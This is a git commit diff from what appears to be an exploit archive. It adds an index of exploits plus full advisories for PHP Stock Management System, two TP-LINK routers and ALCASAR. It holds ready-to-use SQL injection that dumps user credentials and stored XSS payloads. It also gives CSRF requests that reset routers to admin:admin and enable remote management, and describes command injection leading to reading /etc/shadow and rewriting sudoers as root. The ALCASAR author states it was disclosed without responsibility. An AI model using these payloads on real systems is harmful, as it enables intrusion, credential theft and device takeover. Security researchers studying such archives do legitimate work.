Updated 09_11_2014
This commit is contained in:
parent
38f34a5333
commit
afeaf30889
19 changed files with 3024 additions and 1 deletions
20
files.csv
20
files.csv
|
@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
|
|||
3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
|
||||
3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
|
||||
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
|
||||
|
@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
|
|||
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
|
||||
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
|
||||
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
|
||||
34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
|
||||
34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
|
||||
34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
|
||||
34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
|
||||
34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
|
||||
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
|
||||
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
|
||||
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
|
||||
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
|
||||
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
|
||||
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
|
||||
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
|
||||
34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
|
||||
34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
|
||||
34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
|
||||
34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
|
||||
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
|
||||
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
189
platforms/aix/dos/34588.txt
Executable file
189
platforms/aix/dos/34588.txt
Executable file
|
@ -0,0 +1,189 @@
|
|||
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
|
||||
# Date : 9-9-2014
|
||||
# Author : jsass
|
||||
?# Vendor Homepage: ?http://www.posnic.com/?
|
||||
# Software Link:? http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: ?1.02
|
||||
# Tested on: kali linux
|
||||
# Twitter : @KwSecurity
|
||||
# Group : Q8 GRAY HAT TEAM
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
|
||||
XSS install.php
|
||||
|
||||
code :
|
||||
|
||||
if(isset($_REQUEST['msg'])) {
|
||||
|
||||
$msg=$_REQUEST['msg'];
|
||||
echo "<p style=color:red>$msg</p>";
|
||||
}
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
SQL INJECTION : stock.php
|
||||
|
||||
code :
|
||||
|
||||
|
||||
include_once("init.php");
|
||||
$q = strtolower($_GET["q"]);
|
||||
if (!$q) return;
|
||||
$db->query("SELECT * FROM stock_avail where quantity >0 ");
|
||||
while ($line = $db->fetchNextObject()) {
|
||||
|
||||
if (strpos(strtolower($line->name), $q) !== false) {
|
||||
echo "$line->name\n";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
SQL INJECTION : view_customers.php
|
||||
|
||||
|
||||
|
||||
|
||||
code :
|
||||
|
||||
$SQL = "SELECT * FROM customer_details";
|
||||
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
|
||||
{
|
||||
|
||||
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
|
||||
|
||||
POST
|
||||
|
||||
searchtxt=1(inject)&Search=Search
|
||||
|
||||
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
SQL INJECTION : view_product.php
|
||||
|
||||
code :
|
||||
|
||||
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
|
||||
$limit=$_GET['limit'];
|
||||
$_GET['limit']=10;
|
||||
}
|
||||
|
||||
$page = $_GET['page'];
|
||||
|
||||
|
||||
if($page)
|
||||
|
||||
$start = ($page - 1) * $limit; //first item to display on this page
|
||||
|
||||
else
|
||||
|
||||
$start = 0; //if no page var is given, set start to 0
|
||||
|
||||
|
||||
|
||||
/* Get data. */
|
||||
|
||||
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
|
||||
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
|
||||
{
|
||||
|
||||
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
$result = mysql_query($sql);
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
|
||||
and
|
||||
|
||||
localhost/demo/POSNIC1.02DesignFix/view_product.php
|
||||
post
|
||||
searchtxt=a(inject)&Search=Search
|
||||
|
||||
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
UPLOAD : logo_set.php
|
||||
|
||||
code :
|
||||
|
||||
<?php if(isset($_POST['submit'])){
|
||||
|
||||
$allowedExts = array("gif", "jpeg", "jpg", "png");
|
||||
$temp = explode(".", $_FILES["file"]["name"]);
|
||||
$extension = end($temp);
|
||||
if ((($_FILES["file"]["type"] == "image/gif")
|
||||
|| ($_FILES["file"]["type"] == "image/png"))
|
||||
&& ($_FILES["file"]["size"] < 20000)
|
||||
&& in_array($extension, $allowedExts))
|
||||
{
|
||||
if ($_FILES["file"]["error"] > 0)
|
||||
{
|
||||
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
$upload= $_FILES["file"]["name"] ;
|
||||
$type=$_FILES["file"]["type"];
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
exploit :
|
||||
|
||||
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
|
||||
AND MORE BUGS
|
||||
|
||||
Bye
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
|
||||
|
||||
sec4ever.com & alm3refh.com
|
||||
|
||||
#########################################################################################################
|
183
platforms/hardware/webapps/34583.txt
Executable file
183
platforms/hardware/webapps/34583.txt
Executable file
|
@ -0,0 +1,183 @@
|
|||
#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
|
||||
#Date: 01.07.14
|
||||
#Vendor: TP-LINK
|
||||
#Affected versions: TL-WR340G/TL-WR340GD
|
||||
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
|
||||
|
||||
Config file - 192.168.1.1/userRpm/config.bin
|
||||
|
||||
|
||||
#1 - Cross Site Scripting
|
||||
|
||||
|
||||
a) Persistent XSS in Network > WAN Settings
|
||||
|
||||
Vulnerable parameter - hostName.
|
||||
|
||||
Request:
|
||||
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var dhcpInf = new Array(
|
||||
1,
|
||||
(...)
|
||||
"</script><script>alert(123)</script>",
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
b) Persitent XSS in Wireless Settings
|
||||
|
||||
Vulnerable parameter - ssid.
|
||||
|
||||
Request:
|
||||
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
c) Persistent XSS in DHCP Settings
|
||||
|
||||
Vulnerable parameter - domain.
|
||||
|
||||
Request:
|
||||
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var DHCPPara = new Array(
|
||||
1,
|
||||
"192.168.1.100",
|
||||
"192.168.1.199",
|
||||
120,
|
||||
"0.0.0.0",
|
||||
"</script><xssed>'\"",
|
||||
"0.0.0.0",
|
||||
"0.0.0.0",
|
||||
1,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
d) Persitent XSS in Security > Domain Filtering
|
||||
|
||||
Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
|
||||
|
||||
Request:
|
||||
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var domainFilterList = new Array(
|
||||
"0000-2400", "hm</script><xssed>'\"", 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
e) Persistent XSS in Dynamic DNS Settings
|
||||
|
||||
Vulnerable parameters - username & cliUrl.
|
||||
|
||||
Request:
|
||||
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var serInf = new Array(
|
||||
"",
|
||||
"",
|
||||
"</script><script>alert(123)</script>",
|
||||
0,
|
||||
0,
|
||||
2,
|
||||
2,
|
||||
0,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
(...)
|
||||
|
||||
|
||||
#2 - CSRF
|
||||
|
||||
|
||||
a) Change LAN IP
|
||||
|
||||
Parameter lanip stands for further ip.
|
||||
|
||||
GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
b) Change remote managment settings
|
||||
|
||||
GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
c) Clear syslog
|
||||
|
||||
GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
d) Reboot device
|
||||
|
||||
GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
|
||||
|
||||
e) Restore factory defaults (admin:admin)
|
||||
|
||||
GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
|
||||
Host: 192.168.1
|
194
platforms/hardware/webapps/34584.txt
Executable file
194
platforms/hardware/webapps/34584.txt
Executable file
|
@ -0,0 +1,194 @@
|
|||
#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
|
||||
#Date: 30.06.14
|
||||
#Vendor: TP-LINK
|
||||
#Affected versions: TL-WR841N / TL-WR841ND
|
||||
#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
#1 - Reflected XSS in Wireless Settings
|
||||
|
||||
Vulnerable parameters - ssid1, ssid2, ssid3, ssid4.
|
||||
|
||||
Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below.
|
||||
|
||||
While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME</script><script>alert(123)</script>&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
(...)
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
0,8,0,"ROUTERNAME</script><script>alert(123)</script>",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#2 - Persistent XSS & CSRF in Wireless Security Settings
|
||||
|
||||
Vulnerable parameter - pskSecret.
|
||||
|
||||
Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var wlanPara = new Array(
|
||||
8, 1, 3, "332", 1, 0, "", 1812, "", "</script><script>alert(123)</script>", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#3 - Persistent XSS & CSRF in Mail Settings
|
||||
|
||||
Vulnerable parameters - FromAddr, ToAddr, SMTPAddr.
|
||||
|
||||
Reason is the same.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=</script><script>alert(123)</script>&User=&Password=&VeriPass=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var autoEmailConf = new Array(
|
||||
"test@test.com",
|
||||
"test1@test.com",
|
||||
"</script><script>alert(123)</script>",
|
||||
0,
|
||||
"",
|
||||
0,
|
||||
0,
|
||||
0,
|
||||
0,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below:
|
||||
http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2
|
||||
|
||||
#4 - Persistent XSS & CSRF in Time Settings
|
||||
|
||||
Vulnerable parameters - ntpA & ntpB.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=</script><script>xssed<>&ntpB=&isTimeChanged=0&start_month=0&start_count=0&start_week=1&start_hour=0&end_month=0&end_count=0&end_week=1&end_hour=0&isDaylightSavingChanged=0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var timeInf = new Array(
|
||||
7,
|
||||
1,
|
||||
2014,
|
||||
2,
|
||||
58,
|
||||
52,
|
||||
0,
|
||||
"</script>xssed<>",
|
||||
"0.0.0.0",
|
||||
2,
|
||||
2,
|
||||
0,
|
||||
2,
|
||||
10,
|
||||
1,
|
||||
0,
|
||||
3,
|
||||
0,
|
||||
0,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#5 - Persistent XSS & CSRF in Dynamic DNS settings
|
||||
|
||||
Vulnerable parameters - username, password, cliUrl.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=</script><script>alert(123)</script>&pwd=password&cliUrl=&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var serInf = new Array(
|
||||
"</script><script>alert(123)</script>",
|
||||
"password",
|
||||
"",
|
||||
0,
|
||||
0,
|
||||
3,
|
||||
2,
|
||||
0,
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#6 - Persistent XSS & CSRF in DHCP settings
|
||||
|
||||
Vulnerable parameter - domain.
|
||||
|
||||
Request:
|
||||
http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=</script>xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Server: Router Webserver
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
|
||||
|
||||
<SCRIPT language="javascript" type="text/javascript">
|
||||
var DHCPPara = new Array(
|
||||
1,
|
||||
"192.168.0.100",
|
||||
"192.168.0.199",
|
||||
120,
|
||||
"192.168.0.1",
|
||||
"</script>xssed<>",
|
||||
"0.0.0.0",
|
||||
"0.0.0.0",
|
||||
1,
|
||||
0,0 );
|
||||
</SCRIPT>
|
||||
|
||||
#7 - Other CSRF's
|
||||
|
||||
a) Clear system logs
|
||||
|
||||
http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1
|
||||
|
||||
b) Reboot device
|
||||
|
||||
http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot
|
||||
|
||||
c) Factory defaults reset (admin:admin)
|
||||
|
||||
http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore
|
||||
|
||||
Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting.
|
213
platforms/linux/remote/34595.py
Executable file
213
platforms/linux/remote/34595.py
Executable file
|
@ -0,0 +1,213 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
####
|
||||
#
|
||||
# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
|
||||
#
|
||||
# Author: eF
|
||||
# Date : 2014-02-10
|
||||
#
|
||||
#
|
||||
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
|
||||
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
|
||||
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
|
||||
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
|
||||
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
|
||||
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
|
||||
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
|
||||
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
|
||||
#
|
||||
#
|
||||
# ALCASAR is a free Network Access Controller which controls the Internet
|
||||
# consultation networks. It authenticates, attributes and protects users'
|
||||
# access regardless their connected equipment (PC, Pokédex, game console,
|
||||
# etc.).
|
||||
#
|
||||
#
|
||||
# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
|
||||
# trivial vulnerability. In the "index.php" file:
|
||||
#
|
||||
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
|
||||
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
|
||||
#
|
||||
# By sending a specially crafted value in the "host" HTTP header, it is possible
|
||||
# to inject the exec() function in order to execute commands as Apache user.
|
||||
#
|
||||
# In addition, the Apache user is able to call sudo for these binaries:
|
||||
#
|
||||
# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
|
||||
# /usr/local/bin/alcasar-conf.sh
|
||||
# /usr/local/sbin/alcasar-mysql.sh
|
||||
# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
|
||||
# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
|
||||
# /usr/local/bin/alcasar-archive.sh
|
||||
# /usr/bin/radwho,/usr/sbin/chilli_query
|
||||
# /usr/local/sbin/alcasar-logout.sh
|
||||
# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
|
||||
# /usr/bin/openssl
|
||||
#
|
||||
# As a result, we can use /usr/bin/openssl to read a file as root:
|
||||
#
|
||||
# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
|
||||
#
|
||||
# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
|
||||
#
|
||||
# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
|
||||
#
|
||||
# In this exploit, I choose to modify the "sudoers" file.
|
||||
#
|
||||
# Note: this vulnerability has been discovered in less than 30 seconds.
|
||||
# Others vulnerabilities are still present. This code has never been audited...
|
||||
# The PHP code is dreadful and needs to be rewritten from scratch.
|
||||
#
|
||||
# Example (post-auth) in file acc/admin/activity.php:
|
||||
#
|
||||
# if (isset($_POST['action'])){
|
||||
# switch ($_POST['action']){
|
||||
# case 'user_disconnect' :
|
||||
# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
|
||||
#
|
||||
#
|
||||
# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
|
||||
#
|
||||
#
|
||||
